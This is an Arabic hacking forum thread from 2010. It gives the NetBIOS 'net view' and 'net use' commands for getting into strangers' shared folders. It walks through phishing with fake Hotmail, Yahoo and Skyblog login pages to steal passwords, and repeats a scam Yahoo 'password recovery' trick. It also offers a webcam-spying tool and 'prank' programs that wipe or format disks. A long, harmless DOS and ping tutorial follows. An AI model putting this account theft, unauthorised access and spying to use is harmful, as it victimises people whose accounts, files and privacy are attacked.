SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن
مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن
إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها
والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk

8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp

طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من
المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن
الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 13:40

السلام
كيف الحال
اليوم جايبلكم الطريقة المعروف بها موقعنا و الطريقة الرائعة لاختراق الهوتميل و الياهو و السكايبلوك
للحصول على روابط الصفحات المزورة تابعو دائما هدا الرابط لان الروابط تتغير باستمرار
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
اما بخصوص الشرح ساشرح في بضع اسطر الخدعة الرهيبة
شوية تركيز هو المطلوب
نبدأ:
لدينا موقع مزور شبيه بموقع الهوتميل و اخر شبيه بموقع الياهو...
المهم انا اختار الموقع الدي احتال به على الضحية متلا انا اريد اختراق هوتميل ساختار صفحة الهوتميل المزورة
سنأخد رابط الصفحة المزورة( موجود داخل الموقع الدي تم دكره في الأعلى)
و سنرسل الرابط الى الضحية و
نحاول اقناعه انه بدخوله الموقع يستطيع ارسال رسائل sms مجانا او اي شيئ
يغريه لكتابة معلوماته بالصفحة الوهمية

بمجرد ما يكتب الاميل و الباسوورد ستاتيه ثفحة تثول له ان الخدمة مستحيلة حاليا..
لان انت تكون داخل الموقع أعلاه ([ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط])
تم اضغط على المسروقات تم ستجد باسوورد الضحية باسهل طريقة و تكون اخترقت بدن تعب بدون وجع راااس هههه
نفس الأمر بالنسبة لصفخة الياهو و السكايبلوك لكن انت استعمل طرق جيدة لتقنع الضحية بالدخول
تحياتي أخوكم lotanas
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لمابعة جديد الصفحات المزورة زورو الموقع التاي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 16:51

برنامج لتجميد الايميلات

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 17:21

هذه بعض المقالب تقدر ترسله لصديقك بالماسنجر ...


1- الماء = هذا المقلب اذا فتحت البرنامج بتصير الشاشه كأنو كابين عليها موية ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

2- القنبله = كأنه قنبلة إذا فتحته راح يبدأ عد تنازلي و بعدين تصير
الشاشة سووودا و بعد شوي تزيح الشاشة السودا و تطلع رسالة اعتذار و أنه
ماهي حقيقه ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

3- الاختراق = هذا المقلب يخلي حبيبك يعتقد ان في هكر اخترق جهازة و تطلع
له رسايل ان الهكر يكلمه وبالنهاية تطلع رسالة اعتذار ان ما حقيقة ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

4- أغلق الجهاز = هذا المقلب ارسله لصديقك اذا مزهقك بالماسنجر وأغلق جهازه ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

5- الخلفية = المقلب هذا يغير الخلفية الى صورة مضحكة عندما تفتحه ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

6- الماوس = هذا المقلب بعد تشغيله يخليك توقف الماوس ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


7- المسح = هذا المقلب يمسح كل اللي بجهازك ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

8- الحذف = هذا المقلب يحذف كل اللي بجهازك ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

9- الساعة = هذا المقلب ساعة متحركة ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

10- السيدي = هذا المقلب السيدي المجنون ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

11- بالمقلوب = هذا المقلب يخلي كل شي بالمقلوب ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

12- الشاشة = هذا المقلب الشاشة المجنونه ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

13- كلمة السر = هذا المقلب تقفيل الشاشة كلمة السر ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

14- الفلوبي = هذا المقلب الفلوبي الخبل ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

15- زلزال = هذا المقلب زلزال الشاشة ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

16- البريد = هذا مقلب البريد ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

17- الفورمت = هذا المقلب يفرمت الجهاز ...
لتحميل المقلب :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

ملاحظة : يمكنك اغلاق معظم المقالب عن طريق الضغط على
Alt + F4
أو
ctrl + alt + delete

ملاحظة: الموضوع منقول
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 17:45

أنا حملت الطريقة السهلة والرائعة

لسرقة ايميل أدخل الى الايمايل الخاص بك
اتبع الخطوات الاتية
أدخل الى boit de rèception
ثم envoyès
ثم corbeille
على الترتيب
ملاحظة يجب أن يكون الايميل على الياهو
ثم ابعث رسالة الى هادا الايميل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أكتب فيها
losspass0000
ايميل الضحية
كود وهمي
ايميل وهمي
ايمايلك الحقيقي*على الياهو
كود ايمايلك الحقيقي*على الياهو
موقع مفضل للضحية*يفضل كتابة قوقل
بالانجلزية طبعا
انتضر 5دقائق
ستعودك رسالة بالكود والاسم
ملاحظة الطريقة صالحة مع الياهو فقط
أرجو عدم ضر الى من ضرك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 18:16

السلام عليكم



اليوم جايبلكم برنامج مفيد لتشغيل اي كاميرة على النت


شرح البرنامج....ولو االبرنامج سهل وميحتاج شرح



victim اكتب ايميل الضحية وحضكم وتطلع بنية هههههههههههههههههه


view لمشاهذة كاميرة الصحية


وهي صورة البرنامج مع الشرح



stop ليقاف الكاميرة



ضع رد اولا



رابط التحميل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 18:30

ليكم تعليم كيفية أختراق الاجهزة بدون أرسال باتش للضحية مايرد لها شي بس تشغيل دماغ





أليكم تعليم كيفية أختراق الاجهزة بدون أرسال باتش للضحية مايرد لها شي بس تشغيل دماغ









[ندعوك
للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]





سلام عليكم ورحمة الله وبركاته..
أليكم تعليم كيفية أختراق الاجهزة بدون أرسال باتش نظام الويندوز. و دمج
ضمن للظحية ما يرادلهة شي بس تشغيل دماغ وأنتباه ....بسم لله نبدي...
لأمر PING هو من أوامر نظام التشغيل Dos و كما هو معروف يعتبر النظام Dos
اساس الويندوز في الأصدارات الأخيرة حيث كان في السابق مستقل نوعاً ما عن
نظام النوافذ.
الأمر Ping هو أمر Dos يستخدم لغرض الفحص و التأكد من التوصيل في
الأتصالات. حيث يقوم بأرسال حزمة بيانات عبر خطوط الأتصال للعنوان المراد
فحصه ثم يقوم بعرض النتائج.
يستخدم هذا الأمر من نافذه أو من وضع تشغيل الـDos و يلزم تعريف للمعايير المراد فحصها.
صيغة الأمر :
المعايير الموضوعة بين القوسين [.....] هي معايير أختيارية يمكن استخدامها
في الأمر و يجب ان يكون مسافه بين الأمر و المعيار و المعيار الذي يليه
(عدم تلاصق الأمر مع المعيار).
أذن يكتب الأمر ثم مسافة ثم معيار ثم مسافه ثم معيار........ثم العنوان
يمكن اختصار الأمر بالأمر و العنوان
لنستعرض بعض المعايير :
t- أستمر بالأرسال للعنوان حتى يتوقف عن الأجابه.
a- اعرض رقم التعريف للعنوان.
n- عدد مرات الأرسال للحزم على العنوان
l- حجم الحزمة المرسله.
f- عدم تجزئه الحزمه المرسله.
i- المدة الزمنيه بين كل حزمه بالميلي ثانية.
v- نوع الخدمة
r- نقاط التحويل أو القفزات في خط الأتصال بالعنوان.
s- الوقت المسجل عند الوصول لكل قفزة او تحويل.
w- مدة الأنتظار لوصول الرد من العنوان.
طريقة تشغيل نافذه DOS
1- بأستخدام MS-DOS Prompt
يتوفر في أنظمة التشغيل الويندوز السابقة للأصدار XP خيار تشغيل نافذه الدوس (DOS) من قائمة البرامج الرئيسية او الفرعيه (أدوات).
بالضغط عليها يتم فتح نافذه الدوس
2- بأستخدام RUN "تنفيذ"
في نظام xp و نظام NT يوفر بها خيار لفتح نافذه تنفيذ الأوامر
ثم تظهر نافذه لأدخال الأمر حيث يستخدم الأمر CMD لفتح نافذه الدوس
======================
استخدام الأمر PING
مقدمة.
الأتصال يتكون من ثلاثه عناصر (المتصل- وسط الاتصال - المتصل به) و يهمنا هنا المتصل و المتصل به (الموقع او الحاسب في الطرف الآخر)
الحاسب عند اتصاله بغيره من الحاسبات يكون في أحد الأوضاع التاليه:
- ضمن شبكة محليه.
- مباشره بشبكة الأنترنت.
- ضمن شبكه محليه متصل بالأنترنت عبر محول (Router).
الصوره التاليه تشمل جميع الأوضاع
فوائد أستخدام الأمر PING
- للتعرف على حاله الشبكة و حاله المستضيف (موقع ما او صفحه ما).
- لتتبع و عزل الأعطال في القطع و في البرامج.
- لأختبار و معايره و أدارة الشبكة.
مضار أستخدام الأمر PING
يمكن اساءه استخدام الأمر من قبل البعض لغرض اشغال او تعطيل او اتخام
المواقع مما يؤدي الى تعطل الموقع (يستخدم من قبل القراصنة او ما يسمى
الهاكر)
عند استخدام الأمر PING يمكن ايقاف عمل الأمر بالضغط (Ctrl+C) عند ذلك يظهر تقرير عن ما تم فحصه.
الفحص الذاتي للحاسب loopback.
يمكن فحص الحاسب بالأمر PING للتأكد من قدرة الحاسب على ارسال و استقبال
المعلومات. هنا لا يتم ارسال أي شىء في الشبكة انما فقط من الحاسب الى
نفسه. و تستخدم هذه الطريقة للتأكد من عمل بطاقة الشبكة المركبه في
الحاسب.
لا يفحص الأمر Ping كرت الأتصال بشكل كامل انما امكانيه الأرسال و الأستقبال فقط.
الأمر المستخدم
PING localhost
أو
PING 127.0.0.1
ستلاحظ المعلومات التاليه في نتيجة الفحص :
انه تم ارسال 4 حزم من المعلومات Packets ولم يفقد منها شيء.
كما سترى معلومة الزمن الذي أخذته كل حزمة في الذهاب و العودة بالميلي ثانية.
الحجم الأساسي للحزمة الواحدة 32 بايت و مدة الأنتظار (الأستماع) الأساسية
منذ لحظة الأرسال حتى عودتها هو 1 ثانية و عدد الحزم الأساسي 4 حزم.
هنا ستلاحظ ان الزمن صفر لكوننا نفحص الحاسب ذاتياً.
فحص حاسب او محول (Router)
قد ترغب في فحص التوصيل بين الحاسب و بين جهاز التحويل (Router) او بين جهاز حاسب آخر في الشبكة او حتى الخادم (Server).
الأمر المستخدم
Ping xxx.xxx.xxx.xxx
مثال :
Ping 192.168.239.132
حيث xxx هي رقم تعريف الشبكة للجهاز المراد فحص الأتصال معه.
كما يمكن استخدام أسم النطاق للحاسب DNS
مثال:
ping example.microsoft.com
أذا ظهر نتيجة الفحص كالتالي:
"Request timed out" يعني ذلك عدم وصول رد من الجهاز الذي تم ارسال الحزم له.
هذا يعني عدة اشياء منها:
- الجهاز لا يعمل.
- خط التوصيل بين الأجهزة فيه خلال (لا يوجد توصيل)
- زمن رد فعل الجهاز الآخر أطول من ثانية.
- عدم وجود خط عودة الى حاسبك (يعني التوصيل سليم - و الجهاز المراد
الأتصال به سليم لكن قد يكون السبب في اعدادات السيرفير للرد و الطريق
المستخدم للرد)
=============
أمثله على استخدام Ping مع موقع ([ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]) هذا موقع غير موجود على الشبكه (خيالي للتمثيل فقط)
1- الأتصال بالموقع و أظهار عنوان المستضيف (أن وجد)
Ping -a exampleforping.net
2- الأتصال بالموقع و ارسال 10 رسائل طول كل رساله 1000 بايت
ping -n 10 -l 1000 exampleforping.net
3- الأتصال بالموقع و تسجيل المسار لأربعة قفزات في الشبكة.
ping -r 4 exampleforping.net
يمكن حفظ نتيجة الأتصال في ملف لديك بأضافه ping wwhattevver.com > ping.doc
اذا كنت تفحص أكثر من جهاز و تريد تخزين النتائج في نفس الملف أضف ping wwhattevver.com >> ping.doc
موضوع الـ DOS موضوع مهم جداً في رأيي ، وتنبع أهمية معرفته من كونه يعتبر
المفتاح الرئيسي للتعامل مع أي جهاز حاسب ألي وأستطيع تشبيه علاقته بعلم
الحاسب الألي بعلاقة جدول الضرب بعلم الرياضيات ، وعلى كل حال فالموضوع
المكتوب هنا موجود لدي منذ فترة طويلة وقد سبق وأن نقلته من موقع ما لا
أتذكره ،، وأستغل هذه الفرصة لدعوة أعضاء هذا المنتدى بإضافة أي معلومة
تتعلق بهذا الموضوع وتصحيح مابه من أخطاء حتى تعم الفائدة للجميع .
كلمة (DOS) اختصار لـ Disk Operating System
* تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
-دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
-الملفات:
إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات.
تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل.
* تسمية الملفات:
ينقسم اسم الملف إلي قسمين:
القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل
بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم
اختياري - يمكن الاستغناء عنه.
-جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
.BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
.COM ملف برنامج ( COMMAND ).
.EXE ملف جاهز للتنفيذ ( EXECUTABLE ).
.DOC ملف نصوص أو وثائق ( DOCUMENT ).
.ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
.BAK ملف احتياطي ( BACKUP ).
.BAS ملف برنامج بيسك ( BASIC ).
.DBF ملف قاعدة بيانات ( DBASE FILE ).
.PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
.SYS ملف تكوين نظام ( SYSTEM ).
.C ملف مصدر مكتوب بلغة سي ( C ).
الرموز المستخدمة في تسمية الملفات:
1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ).
2-الأرقام من 0 إلي 9 .
3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، # ، ‍‍‍‍‌! ).
* الشروط التي يجب مراعاتها عند اختيار اسم الملف:
1- طول الاسم الأساسي للملف من 1-8 حروف.
2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف.
3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ).
4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات.
5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم .
6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة.
7- عدم استخدام الرموز ذات الدلالة الخاصة لنظام التشغيل وهي * ، / ، \ ، + ، = ، ؟).
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة.
-تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
-أقسام الأدلة: تقسم الأدلة إلي أربعة أقسام:
1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة وتوضع تحته جميع الملفات المنشأة.
2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ).
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
-ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
-الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
-يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.
3-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم.
ومثال على ذلك:
SCHOOL\CLASS
إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS ).
4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو
الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا
يرتبط بدليل أبوي.
* طريقة تحميل نظام التشغيل من الأسطوانة المرنة: هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
* رموز محركات الأقراص في نظام التشغيل ( DOS ):
1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
أ-أسطوانة مرنة حجم 3.5 بوصة.
ب-أسطوانة مرنة حجم 5.25 بوصة.
-ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
2-القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
3- ( CD-ROM ): ويرمز له بالرمز D أو E.
* طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :
* الملفات الأساسية لنظام التشغيل الـ ( DOS ):
يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل.
ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
* مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من
التعليمات والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه
التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو
تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات
للمستخدم وتيسر له استخدام الكمبيوتر .
* الاختصارات :
يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدلالة على غياب حرف واحد فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدلالة على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8 أحرف).
* الأوامر:
تنقسم أوامر الـ DOS إلى قسمين:
1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM
أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من
الأوامر لا يستلزم وجود أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS - TIME - DATE - MD - CD - RD - DIR - DEL
2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM
أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها
يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT
- تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
1-أوامر النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2-أوامر الاسطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3-أوامر الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4-أوامر الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
PRINT
FIND
EDIT
SORT
MSAV
MORE
HELP
5-الأوامر الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE
GOTO
6-أوامر خاصة ونادرة الاستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
DEBUG
KEYB
EXPAND
DRVSPACE
SUBST
LOAD HIGH
INTERSVR
GRAPHICS
VERIFY
REPLACE
POWER
* شرح لأهم الأوامر المستخدمة في نظام الـ DOS :
1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر
الداخلية ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
-ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .
2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك
Enter New Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر
ثم اليوم ثم السنة وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح
الإدخال ENTER بدون كتابة إي شئ.
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
-شروط كتابة التاريخ في نظام التشغيل DOS:
1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.
2-لا يمكن استخدام التاريخ الهجري.
3-لا يمكن كتابة الأشهر بالحروف.
4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ
5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة .
3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]55.75a
وكذلك Enter New Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم
الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في
كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .
4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو
من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها
وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ
الأمر.
ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.
5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل.
ومن أهم استخدامات الأمر PROMPT التالي:
PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم
PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي
PROMPT $Q تغيير شكل المحث C إلي علامة =
PROMPT $$ تغيير شكل المحث C إلي علامة $
PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل
6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي
ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .
7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلاله نستطيع عرض :
1-اسم الاسطوانة والرقم المسلسل لها.
2-اسم الفهرس الحالي والمسار الحالي له.
3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده)
-مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) .
4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس
وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت
إنشاء الفهرس ).
5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات.
6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص .
أهم صور استخدامات الأمر DIR:
DIR/P لعرض الملفات صفحة صفحة
DIR/W لعرض الملفات بعرض الشاشة
DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط
DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة
DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي
DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z
